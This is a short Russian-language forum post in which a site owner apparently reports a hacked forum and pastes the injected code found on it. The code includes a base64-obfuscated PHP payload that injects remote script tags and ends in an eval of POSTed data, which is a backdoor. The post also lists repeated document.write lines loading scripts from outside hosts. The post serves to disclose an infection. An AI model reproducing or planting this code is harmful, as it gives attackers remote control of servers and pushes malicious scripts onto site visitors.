на главной форума такая гадость:
CODE:
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneXAyOScpKXtmdW5jdGlvbiB5cDI5KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNSeVlYWmxiR1JwY21WamRDMTBhR0ZwYkdGdVpDNWpiMjB2YVcxaFoyVnpMelF3TVM1emFIUnRiQzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHlwMjkyKCRhLCRiLCRjLCRkKXtnbG9iYWwkeXAyOTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHlwMjkxKSljYWxsX3VzZXJfZnVuYygkeXAyOTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3lwMjknKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd5cDI5Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHlwMjlsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCd5cDI5MicpKSE9J3lwMjkyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
на остальных индексных страницах:
CODE:
<script src=http://traveldirect-thailand.com/images/401.shtml.php ></script>
в ява скриптах в конце:
CODE:
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://crestereaiepurilor.lx.ro/images/pj.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://onlyplaygame.com/services/comments.php ><\/script>');
document.write('<script src=http://crestereaiepurilor.lx.ro/images/pj.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');
document.write('<script src=http://traveldirect-thailand.com/images/401.shtml.php ><\/script>');